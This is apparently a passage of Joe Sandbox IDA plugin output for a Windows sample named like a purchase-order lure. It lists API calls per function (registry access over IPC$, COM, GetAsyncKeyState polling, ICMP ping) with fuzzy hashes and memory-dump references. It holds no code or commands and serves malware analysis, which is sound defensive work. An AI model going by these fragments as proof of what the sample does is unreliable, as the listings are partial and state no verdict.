                          • GetWindowRect.USER32(00000000,?), ref: 00F65D7B
                          • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00F65DCF
                          • GetDlgItem.USER32(?,000003E9), ref: 00F65DDD
                          • GetWindowRect.USER32(00000000,?), ref: 00F65DEF
                          • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00F65E31
                          • GetDlgItem.USER32(?,000003EA), ref: 00F65E44
                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F65E5A
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00F65E67
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$ItemMoveRect$Invalidate
                          • String ID:
                          • API String ID: 3096461208-0
                          • Opcode ID: 20a6d6055f014675bb063f0a2e1e8d8b8734ccc2d00b1e7c7caba06eebd1a61c
                          • Instruction ID: 9a5a51af6a59beae0393b1b4b202f10eee387a102067b5b7d37bfc49983a5104
                          • Opcode Fuzzy Hash: 20a6d6055f014675bb063f0a2e1e8d8b8734ccc2d00b1e7c7caba06eebd1a61c
                          • Instruction Fuzzy Hash: A8510D71E00609AFDF18CFA8DD89AAEBBB5EB48710F548129F519E7290D7709E04DB60
                          APIs
                            • Part of subcall function 00F18F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F18BE8,?,00000000,?,?,?,?,00F18BBA,00000000,?), ref: 00F18FC5
                          • DestroyWindow.USER32(?), ref: 00F18C81
                          • KillTimer.USER32(00000000,?,?,?,?,00F18BBA,00000000,?), ref: 00F18D1B
                          • DestroyAcceleratorTable.USER32(00000000), ref: 00F56973
                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00F18BBA,00000000,?), ref: 00F569A1
                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00F18BBA,00000000,?), ref: 00F569B8
                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F18BBA,00000000), ref: 00F569D4
                          • DeleteObject.GDI32(00000000), ref: 00F569E6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                          • String ID:
                          • API String ID: 641708696-0
                          • Opcode ID: 3d83f2ee960a7ccd53f13babf3c2856b3ba0db75dd0281ff83a17378c40b2d51
                          • Instruction ID: f1ad5c81115dadd41cedcb1e77215bc67221bf3328dfdba92c79ae7c74720c82
                          • Opcode Fuzzy Hash: 3d83f2ee960a7ccd53f13babf3c2856b3ba0db75dd0281ff83a17378c40b2d51
                          • Instruction Fuzzy Hash: BD61DD32902708EFDB258F24DA58BA577F2FB403A2F50451AE14297960CB35ACC6FF91
                          APIs
                            • Part of subcall function 00F19944: GetWindowLongW.USER32(?,000000EB), ref: 00F19952
                          • GetSysColor.USER32(0000000F), ref: 00F19862
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ColorLongWindow
                          • String ID:
                          • API String ID: 259745315-0
                          • Opcode ID: fcc481da219809e18e19ab264fbb6a30566a0f53ba57a60db67f72e3e883d160
                          • Instruction ID: 503143f749cb6e11e77ec6f7538ff87c48ebe9dede03f637c9f494ef6a63169d
                          • Opcode Fuzzy Hash: fcc481da219809e18e19ab264fbb6a30566a0f53ba57a60db67f72e3e883d160
                          • Instruction Fuzzy Hash: 1441D331508644AFDB205F389C94BF93BA5BB46731F984606FAA2871E1D7719C81FB90
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00F4F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00F69717
                          • LoadStringW.USER32(00000000,?,00F4F7F8,00000001), ref: 00F69720
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00F4F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00F69742
                          • LoadStringW.USER32(00000000,?,00F4F7F8,00000001), ref: 00F69745
                          • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00F69866
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString$Message_wcslen
                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                          • API String ID: 747408836-2268648507
                          • Opcode ID: 839f91b81e936b3955618346c2e78a5d39c589f937500260565ae7f176dee114
                          • Instruction ID: 843b47bd77da6df93247f5c471a9fa660a75f82e11d1baedfe1ab66516a6b682
                          • Opcode Fuzzy Hash: 839f91b81e936b3955618346c2e78a5d39c589f937500260565ae7f176dee114
                          • Instruction Fuzzy Hash: A4414072804219AADF04EBE0CE87EEE777CEF54340F504125B605B2092EA796F48FB61
                          APIs
                            • Part of subcall function 00F06B57: _wcslen.LIBCMT ref: 00F06B6A
                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F607A2
                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F607BE
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F607DA
                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F60804
                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00F6082C
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F60837
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F6083C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                          • API String ID: 323675364-22481851
                          • Opcode ID: b2e460f3d7d7100aae2767287815ab675cbff58ff78bb5fbdfba75d024741736
                          • Instruction ID: a81e9a5edbc2a85f4a3a2bf7f746dd2565d292672c1f25ce5ec27e8876686f9d
                          • Opcode Fuzzy Hash: b2e460f3d7d7100aae2767287815ab675cbff58ff78bb5fbdfba75d024741736
                          • Instruction Fuzzy Hash: FD411872C10229ABCF15EBA4DC85DEEB778FF44750F544169E901A31A1EB34AE44EBA0
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00F83C5C
                          • CoInitialize.OLE32(00000000), ref: 00F83C8A
                          • CoUninitialize.OLE32 ref: 00F83C94
                          • _wcslen.LIBCMT ref: 00F83D2D
                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00F83DB1
                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F83ED5
                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00F83F0E
                          • CoGetObject.OLE32(?,00000000,00F9FB98,?), ref: 00F83F2D
                          • SetErrorMode.KERNEL32(00000000), ref: 00F83F40
                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F83FC4
                          • VariantClear.OLEAUT32(?), ref: 00F83FD8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                          • String ID:
                          • API String ID: 429561992-0
                          • Opcode ID: 3b0717fc8cbadb47fa80e020fc8e6b10300570c9872572873984f700c9462301
                          • Instruction ID: 76cc72fccde8d0dedcdd43a9c14ec1c54c3dcb54362f4632f7c0f5f80796be6b
                          • Opcode Fuzzy Hash: 3b0717fc8cbadb47fa80e020fc8e6b10300570c9872572873984f700c9462301
                          • Instruction Fuzzy Hash: D1C159716083059FD700EF68C88496BB7E9FF89B54F10491DF9899B261DB30ED05DB92
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 00F77AF3
                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F77B8F
                          • SHGetDesktopFolder.SHELL32(?), ref: 00F77BA3
                          • CoCreateInstance.OLE32(00F9FD08,00000000,00000001,00FC6E6C,?), ref: 00F77BEF
                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F77C74
                          • CoTaskMemFree.OLE32(?,?), ref: 00F77CCC
                          • SHBrowseForFolderW.SHELL32(?), ref: 00F77D57
                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F77D7A
                          • CoTaskMemFree.OLE32(00000000), ref: 00F77D81
                          • CoTaskMemFree.OLE32(00000000), ref: 00F77DD6
                          • CoUninitialize.OLE32 ref: 00F77DDC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                          • String ID:
                          • API String ID: 2762341140-0
                          • Opcode ID: 964c67b1d4b65593974b3e458433eb8a8a1fdc25b75a42a5915d217122514234
                          • Instruction ID: ea46642bd017d4fb149fbd719983c8800a2112a57963310e557f314f492ea2f2
                          • Opcode Fuzzy Hash: 964c67b1d4b65593974b3e458433eb8a8a1fdc25b75a42a5915d217122514234
                          • Instruction Fuzzy Hash: 74C13A75A04209AFCB14DFA4C884DAEBBF9FF48314B148499E81ADB361D730EE45DB91
                          APIs
                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F95504
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F95515
                          • CharNextW.USER32(00000158), ref: 00F95544
                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F95585
                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F9559B
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F955AC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$CharNext
                          • String ID:
                          • API String ID: 1350042424-0
                          • Opcode ID: 2aa02a58f20f9e2a60161e73a51fda29df9638a65f28645d66d9caf15352b5f0
                          • Instruction ID: 953b0aa69da330b33279d253b5a83e6e7a78816b7a80ddff963a30ff4414c04c
                          • Opcode Fuzzy Hash: 2aa02a58f20f9e2a60161e73a51fda29df9638a65f28645d66d9caf15352b5f0
                          • Instruction Fuzzy Hash: DB61A031900608AFFF12DF54CC94AFE7BB9EB05B34F144145FA25AA291D7749A80FB61
                          APIs
                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F5FAAF
                          • SafeArrayAllocData.OLEAUT32(?), ref: 00F5FB08
                          • VariantInit.OLEAUT32(?), ref: 00F5FB1A
                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F5FB3A
                          • VariantCopy.OLEAUT32(?,?), ref: 00F5FB8D
                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F5FBA1
                          • VariantClear.OLEAUT32(?), ref: 00F5FBB6
                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00F5FBC3
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F5FBCC
                          • VariantClear.OLEAUT32(?), ref: 00F5FBDE
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F5FBE9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                          • String ID:
                          • API String ID: 2706829360-0
                          • Opcode ID: 0f1d542ecc88648aeee3fa79922ae8bb7e9f65b95638f5cb5ffe205108ae1add
                          • Instruction ID: c08083df8a640b7928716ba5e673a958f058874935857315567e4037e32c0556
                          • Opcode Fuzzy Hash: 0f1d542ecc88648aeee3fa79922ae8bb7e9f65b95638f5cb5ffe205108ae1add
                          • Instruction Fuzzy Hash: 4D416235A0021AEFCF04DF68CC549ADBBB9FF48355F008065E946A7261CB34A949EFE1
                          APIs
                          • GetKeyboardState.USER32(?), ref: 00F69CA1
                          • GetAsyncKeyState.USER32(000000A0), ref: 00F69D22
                          • GetKeyState.USER32(000000A0), ref: 00F69D3D
                          • GetAsyncKeyState.USER32(000000A1), ref: 00F69D57
                          • GetKeyState.USER32(000000A1), ref: 00F69D6C
                          • GetAsyncKeyState.USER32(00000011), ref: 00F69D84
                          • GetKeyState.USER32(00000011), ref: 00F69D96
                          • GetAsyncKeyState.USER32(00000012), ref: 00F69DAE
                          • GetKeyState.USER32(00000012), ref: 00F69DC0
                          • GetAsyncKeyState.USER32(0000005B), ref: 00F69DD8
                          • GetKeyState.USER32(0000005B), ref: 00F69DEA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 2f8ef34f63edb187ba27c551240345eede09ffa1c4083ae3196f408eedf3f7d2
                          • Instruction ID: 1d198553093773c82875200f16ddc8a90cf79feac1ac4b9d00e7c19c703502d5
                          • Opcode Fuzzy Hash: 2f8ef34f63edb187ba27c551240345eede09ffa1c4083ae3196f408eedf3f7d2
                          • Instruction Fuzzy Hash: 3B41D934D0C7CA69FF308761C4043B5BEA8EF11364F08806ADAC6565C2DBF599C8E7A2
                          APIs
                          • WSAStartup.WSOCK32(00000101,?), ref: 00F805BC
                          • inet_addr.WSOCK32(?), ref: 00F8061C
                          • gethostbyname.WSOCK32(?), ref: 00F80628
                          • IcmpCreateFile.IPHLPAPI ref: 00F80636
                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F806C6
                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F806E5
                          • IcmpCloseHandle.IPHLPAPI(?), ref: 00F807B9
                          • WSACleanup.WSOCK32 ref: 00F807BF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                          • String ID: Ping
                          • API String ID: 1028309954-2246546115
                          • Opcode ID: ae8a8215e1ec8d726abd9797a37ac62f83b8d79114094d99e66593cbd1584753
                          • Instruction ID: c986d05509ea86f540ebf5a107a2afe6a8ad2e0cc6d6a10a2e8ca8c0fc8d60c4
                          • Opcode Fuzzy Hash: ae8a8215e1ec8d726abd9797a37ac62f83b8d79114094d99e66593cbd1584753
                          • Instruction Fuzzy Hash: B591B335A082019FD760DF15C889F5ABBE0AF44328F5485A9F4658B7A2CB34FC49EF91
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$BuffCharLower
                          • String ID: cdecl$none$stdcall$winapi
                          • API String ID: 707087890-567219261
                          • Opcode ID: 10b31eb1e1ab62f79b41f02a3ed5948e02f2efec87422be1441f309eaa38c0c1
                          • Instruction ID: 28437af7607588ebe9cf3d380c8ee2f9fa3f10156349b8c84d743bd47ec23914
                          • Opcode Fuzzy Hash: 10b31eb1e1ab62f79b41f02a3ed5948e02f2efec87422be1441f309eaa38c0c1
                          • Instruction Fuzzy Hash: CB51C632E041169BCB14EFACCD419FEB7A5BF64360BA04229E426E72C5DB74DD42E790
                          APIs
                          • CoInitialize.OLE32 ref: 00F83774
                          • CoUninitialize.OLE32 ref: 00F8377F
                          • CoCreateInstance.OLE32(?,00000000,00000017,00F9FB78,?), ref: 00F837D9
                          • IIDFromString.OLE32(?,?), ref: 00F8384C
                          • VariantInit.OLEAUT32(?), ref: 00F838E4
                          • VariantClear.OLEAUT32(?), ref: 00F83936
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                          • API String ID: 636576611-1287834457
                          • Opcode ID: f712d76481347c355db7ddf14b7b70841d56453b22135c7649f4d9ce3c9d26c3
                          • Instruction ID: 068cca6a7d04c25939ac2c01097c579e29c0abf40c42abb7aa9cd4df702fcd0d
                          • Opcode Fuzzy Hash: f712d76481347c355db7ddf14b7b70841d56453b22135c7649f4d9ce3c9d26c3
                          • Instruction Fuzzy Hash: 7661A071608301AFD710EF54C849FAAB7E8EF48B10F10484DF985972A1D774EE48EB92
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00F733CF
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F733F0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: LoadString$_wcslen
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                          • API String ID: 4099089115-3080491070
                          • Opcode ID: e3e7a32aed7a60e2ae980d4042ea2a5cb795accf851532df0dd657a5f819e9ff
                          • Instruction ID: 0a4d52221d697d15ae90f437b76d0fd647554a1fca86033f021b6bcddc7e88ae
                          • Opcode Fuzzy Hash: e3e7a32aed7a60e2ae980d4042ea2a5cb795accf851532df0dd657a5f819e9ff
                          • Instruction Fuzzy Hash: 6C519271D0420ABADF19EBA0CD42EEEB779AF04300F544166F505B2092EB796F58FB61
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$BuffCharUpper
                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                          • API String ID: 1256254125-769500911
                          • Opcode ID: b5c87639251579f2b2dea347a43ad4d0687a3cfff180e460078a52fb4ff58393
                          • Instruction ID: e7d2bc542e54ec1a15d075a7dbe55064813e239d9ee18d189ba7b5209304c389
                          • Opcode Fuzzy Hash: b5c87639251579f2b2dea347a43ad4d0687a3cfff180e460078a52fb4ff58393
                          • Instruction Fuzzy Hash: E041D332E001279ACB206F7DCD915BEB7A5AFA0764B244269E421DB284E776CDC1E790
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00F753A0
                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F75416
                          • GetLastError.KERNEL32 ref: 00F75420
                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00F754A7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
